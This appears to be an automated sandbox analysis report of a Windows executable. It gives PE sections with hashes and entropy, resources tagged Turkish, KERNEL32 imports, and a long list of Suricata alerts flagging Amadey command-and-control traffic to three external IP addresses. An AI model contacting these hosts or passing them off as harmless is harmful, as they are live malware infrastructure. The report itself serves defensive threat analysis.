IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4f968	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x4f920	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4e000	0x14c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4ce2a	0x4d000	c40f278c5995485ca178fd9b75683208	False	0.7998395647321429	data	7.233134172061625	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x4e000	0x22e8	0x2400	8e1cc1a6c7117d3d2424095a9968c088	False	0.3340928819444444	data	4.866691324310971	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x51000	0x3da0	0x1800	8ebe6adf3fe46a8c0c68c4ecd609f2d0	False	0.24007161458333334	data	2.6326890034054373	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x55000	0x51d	0x600	d00a0884dfc2593613905d91d2ea3f37	False	0.015625	data	0.007830200398677895	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x56000	0x18460	0x12600	6385ce4df269e55a3761593d6a5fa181	False	0.4554634353741497	data	5.191712838481371	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x637c8	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.4276315789473684
RT_CURSOR	0x63910	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0x63a40	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_ICON	0x56730	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.5908848614072495
RT_ICON	0x575d8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.6624548736462094
RT_ICON	0x57e80	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.7321428571428571
RT_ICON	0x58548	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.7630057803468208
RT_ICON	0x58ab0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkish	Turkey	0.5494813278008299
RT_ICON	0x5b058	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkish	Turkey	0.6709662288930581
RT_ICON	0x5c100	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkish	Turkey	0.6860655737704918
RT_ICON	0x5ca88	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkish	Turkey	0.8085106382978723
RT_ICON	0x5cf68	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.3435501066098081
RT_ICON	0x5de10	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.47021660649819497
RT_ICON	0x5e6b8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.5028801843317973
RT_ICON	0x5ed80	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.5223988439306358
RT_ICON	0x5f2e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Turkish	Turkey	0.42697095435684645
RT_ICON	0x61890	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkish	Turkey	0.43644465290806755
RT_ICON	0x62938	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.43524590163934423
RT_ICON	0x632c0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.4521276595744681
RT_DIALOG	0x661c0	0x84	data			0.7651515151515151
RT_STRING	0x66248	0x424	Matlab v4 mat-file (little endian) u, numeric, rows 0, columns 0			0.44716981132075473
RT_STRING	0x66670	0x41e	data			0.4686907020872865
RT_STRING	0x66a90	0xb8	data			0.5652173913043478
RT_STRING	0x66b48	0x7de	data			0.4195630585898709
RT_STRING	0x67328	0x63a	data			0.4385194479297365
RT_STRING	0x67968	0x560	data			0.4498546511627907
RT_STRING	0x67ec8	0x49c	data			0.4542372881355932
RT_STRING	0x68368	0xf2	data			0.5454545454545454
RT_ACCELERATOR	0x637a0	0x28	data			1.025
RT_GROUP_CURSOR	0x638f8	0x14	data			1.15
RT_GROUP_CURSOR	0x65fe8	0x22	data			1.088235294117647
RT_GROUP_ICON	0x63728	0x76	data	Turkish	Turkey	0.6694915254237288
RT_GROUP_ICON	0x5cef0	0x76	data	Turkish	Turkey	0.6610169491525424
RT_VERSION	0x66010	0x1ac	data			0.5981308411214953

Imports

DLL

Import

KERNEL32.dll

GetCommandLineW, GetFullPathNameA, TryEnterCriticalSection, GetConsoleAliasesLengthW, GetNumaProcessorNode, DebugActiveProcessStop, GetDefaultCommConfigW, CallNamedPipeA, InterlockedIncrement, GetEnvironmentStringsW, GlobalLock, GetComputerNameW, FlushConsoleInputBuffer, GetModuleHandleW, GetUserDefaultLangID, GetSystemTimes, SetHandleCount, GlobalAlloc, LoadLibraryW, WriteConsoleOutputA, HeapDestroy, SetConsoleMode, CreateDirectoryA, InterlockedExchange, GetStartupInfoA, GetStdHandle, GetLastError, GetProcAddress, UnhandledExceptionFilter, FindNextChangeNotification, FindAtomA, FoldStringW, GetModuleFileNameA, EnumDateFormatsA, FreeEnvironmentStringsW, VirtualProtect, LocalSize, CloseHandle, HeapFree, HeapAlloc, EncodePointer, DecodePointer, MultiByteToWideChar, GetCommandLineA, HeapSetInformation, GetStartupInfoW, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, ExitProcess, WriteFile, GetModuleFileNameW, Sleep, HeapSize, GetCPInfo, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, WideCharToMultiByte, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LeaveCriticalSection, EnterCriticalSection, HeapReAlloc, RtlUnwind, LCMapStringW, GetStringTypeW, IsProcessorFeaturePresent

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-27T14:19:31.435478+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52219	80	192.168.2.6	89.23.103.42
2024-08-27T14:20:43.100007+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52370	80	192.168.2.6	185.209.162.226
2024-08-27T14:22:15.580908+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52586	80	192.168.2.6	185.209.162.226
2024-08-27T14:19:45.157697+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52253	80	192.168.2.6	185.209.162.226
2024-08-27T14:19:50.557182+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52264	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:39.748628+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52364	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:36.561898+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52359	80	192.168.2.6	185.208.158.116
2024-08-27T14:19:58.939664+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52280	80	192.168.2.6	185.209.162.226
2024-08-27T14:20:22.975531+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52330	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:10.496184+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52574	80	192.168.2.6	185.208.158.116
2024-08-27T14:19:33.482369+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52229	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:04.262728+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52293	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:19.685889+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52317	80	192.168.2.6	89.23.103.42
2024-08-27T14:20:19.450218+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52322	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:47.087856+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52523	80	192.168.2.6	185.208.158.116
2024-08-27T14:19:40.895829+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52245	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:44.014758+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52516	80	192.168.2.6	185.209.162.226
2024-08-27T14:21:10.044027+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52434	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:55.810852+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52400	80	192.168.2.6	185.209.162.226
2024-08-27T14:21:45.541382+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52520	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:15.236875+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52446	80	192.168.2.6	185.209.162.226
2024-08-27T14:20:59.144425+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52406	80	192.168.2.6	185.209.162.226
2024-08-27T14:20:17.107525+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52318	80	192.168.2.6	185.208.158.116
2024-08-27T14:19:59.576313+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52282	80	192.168.2.6	185.208.158.116
2024-08-27T14:19:39.794330+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52241	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:26.575494+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52338	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:07.638804+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52299	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:39.314619+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52504	80	192.168.2.6	185.209.162.226
2024-08-27T14:22:52.592279+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52675	80	192.168.2.6	185.209.162.226
2024-08-27T14:22:03.217651+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52560	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:48.029573+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52517	80	192.168.2.6	89.23.103.42
2024-08-27T14:22:16.948103+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52591	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:44.451617+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52657	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:11.989441+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52578	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:50.208984+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52667	80	192.168.2.6	185.209.162.226
2024-08-27T14:22:12.232849+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52579	80	192.168.2.6	185.209.162.226
2024-08-27T14:22:12.232849+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52570	80	192.168.2.6	89.23.103.42
2024-08-27T14:22:57.292821+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52688	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:42.300416+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52512	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:44.014846+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52515	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:32.828919+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52351	80	192.168.2.6	185.208.158.116
2024-08-27T14:19:47.545451+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52258	80	192.168.2.6	185.209.162.226
2024-08-27T14:22:42.892528+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52653	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:10.469408+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52301	80	192.168.2.6	185.209.162.226
2024-08-27T14:22:46.025463+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52661	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:49.092166+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52385	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:09.805412+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52303	80	192.168.2.6	185.208.158.116
2024-08-27T14:19:48.461938+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52259	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:52.592217+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52668	80	192.168.2.6	89.23.103.42
2024-08-27T14:22:33.110351+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52630	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:14.230992+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52445	80	192.168.2.6	185.208.158.116
2024-08-27T14:19:53.665209+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52271	80	192.168.2.6	185.208.158.116
2024-08-27T14:19:53.171455+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52268	80	192.168.2.6	185.209.162.226
2024-08-27T14:19:52.601087+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52270	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:08.980983+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52572	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:20.264007+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52599	80	192.168.2.6	185.209.162.226
2024-08-27T14:20:43.768567+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52366	80	192.168.2.6	89.23.103.42
2024-08-27T14:19:42.016326+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52246	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:17.635643+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52453	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:12.953459+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52581	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:37.373463+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52358	80	192.168.2.6	185.209.162.226
2024-08-27T14:22:34.637379+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52633	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:39.141295+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52505	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:11.638827+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52302	80	192.168.2.6	89.23.103.42
2024-08-27T14:21:52.045254+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52534	80	192.168.2.6	185.209.162.226
2024-08-27T14:20:15.663490+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52316	80	192.168.2.6	185.209.162.226
2024-08-27T14:22:03.428843+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52559	80	192.168.2.6	185.209.162.226
2024-08-27T14:19:46.351545+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52256	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:13.266721+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52309	80	192.168.2.6	185.209.162.226
2024-08-27T14:21:15.889029+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52442	80	192.168.2.6	89.23.103.42
2024-08-27T14:21:56.060842+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52544	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:00.076654+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52553	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:07.857592+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52421	80	192.168.2.6	89.23.103.42
2024-08-27T14:22:17.873633+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52592	80	192.168.2.6	185.209.162.226
2024-08-27T14:22:21.929364+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52603	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:15.889008+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52448	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:37.124497+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52639	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:33.473148+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52492	80	192.168.2.6	185.208.158.116
2024-08-27T14:18:50.544689+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52689	80	192.168.2.6	89.23.103.42
2024-08-27T14:20:56.945775+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52403	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:55.104556+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52541	80	192.168.2.6	185.208.158.116
2024-08-27T14:19:51.560653+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52265	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:40.163886+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52646	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:06.152888+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52424	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:10.847891+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52305	80	192.168.2.6	185.208.158.116
2024-08-27T14:19:56.306539+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52276	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:59.826390+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52402	80	192.168.2.6	89.23.103.42
2024-08-27T14:22:29.073977+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52619	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:23.920297+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52461	80	192.168.2.6	89.23.103.42
2024-08-27T14:20:30.839726+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52346	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:47.759367+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52664	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:40.708331+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52508	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:35.967761+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52498	80	192.168.2.6	185.208.158.116
2024-08-27T14:19:49.523654+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52262	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:41.799672+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52509	80	192.168.2.6	185.209.162.226
2024-08-27T14:20:53.521242+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52396	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:26.598698+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52613	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:01.659664+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52557	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:31.951469+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52488	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:21.294670+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52326	80	192.168.2.6	185.209.162.226
2024-08-27T14:20:01.957695+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52287	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:27.104226+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52475	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:51.795022+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52392	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:47.800396+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52663	80	192.168.2.6	185.209.162.226
2024-08-27T14:20:35.748286+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52349	80	192.168.2.6	89.23.103.42
2024-08-27T14:20:14.634756+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52314	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:47.479464+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52522	80	192.168.2.6	185.209.162.226
2024-08-27T14:20:40.891720+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52368	80	192.168.2.6	185.208.158.116
2024-08-27T14:19:25.583530+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52213	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:15.663520+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52315	80	192.168.2.6	185.208.158.116
2024-08-27T14:19:36.363894+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52236	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:49.645624+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52526	80	192.168.2.6	185.209.162.226
2024-08-27T14:22:23.665461+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52606	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:29.479928+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52482	80	192.168.2.6	185.208.158.116
2024-08-27T14:19:32.439672+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52226	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:35.099905+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52354	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:09.864214+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52571	80	192.168.2.6	185.209.162.226
2024-08-27T14:20:01.184998+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52285	80	192.168.2.6	185.209.162.226
2024-08-27T14:19:44.233879+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52252	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:47.100702+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52381	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:36.420344+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52637	80	192.168.2.6	185.209.162.226
2024-08-27T14:20:24.430806+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52333	80	192.168.2.6	185.208.158.116
2024-08-27T14:19:55.576510+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52269	80	192.168.2.6	89.23.103.42
2024-08-27T14:21:20.634771+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52460	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:39.748598+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52365	80	192.168.2.6	185.209.162.226
2024-08-27T14:20:44.496536+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52376	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:58.506913+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52407	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:18.536694+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52595	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:20.264171+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52593	80	192.168.2.6	89.23.103.42
2024-08-27T14:22:30.629823+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52623	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:50.909575+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52671	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:09.453510+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52431	80	192.168.2.6	185.209.162.226
2024-08-27T14:21:34.988645+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52495	80	192.168.2.6	185.208.158.116
2024-08-27T14:19:39.529328+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52242	80	192.168.2.6	185.209.162.226
2024-08-27T14:19:58.703292+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52281	80	192.168.2.6	185.208.158.116
2024-08-27T14:19:45.299718+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52254	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:07.328140+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52567	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:49.306679+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52669	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:54.776247+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52681	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:28.342161+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52610	80	192.168.2.6	89.23.103.42
2024-08-27T14:19:42.863188+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52247	80	192.168.2.6	185.209.162.226
2024-08-27T14:22:28.111806+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52616	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:55.377437+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52540	80	192.168.2.6	185.209.162.226
2024-08-27T14:20:33.923843+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52352	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:51.795020+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52384	80	192.168.2.6	89.23.103.42
2024-08-27T14:21:57.661641+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52545	80	192.168.2.6	185.209.162.226
2024-08-27T14:19:47.545416+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52251	80	192.168.2.6	89.23.103.42
2024-08-27T14:21:50.431532+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52530	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:03.576307+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52291	80	192.168.2.6	185.209.162.226
2024-08-27T14:19:31.435574+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52225	80	192.168.2.6	185.209.162.226
2024-08-27T14:20:06.394377+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52298	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:22.278039+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52464	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:56.228996+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52682	80	192.168.2.6	185.209.162.226
2024-08-27T14:21:23.220842+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52465	80	192.168.2.6	185.209.162.226
